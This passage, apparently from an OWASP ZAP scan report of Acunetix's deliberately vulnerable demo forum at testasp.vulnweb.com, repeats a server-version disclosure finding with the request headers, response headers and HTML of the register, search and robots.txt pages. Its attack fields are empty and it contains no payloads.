examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 402 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3673 |
| Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/robots.txt |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 216 bytes. |
GET http://testasp.vulnweb.com/robots.txt HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 245 bytes. |
HTTP/1.1 200 OK
Content-Type: text/plain Last-Modified: Mon, 06 May 2019 12:45:52 GMT Accept-Ranges: bytes ETag: "3629faa394d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 13 |
| Response Body - size: 13 bytes. |
User-agent: *
|
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln 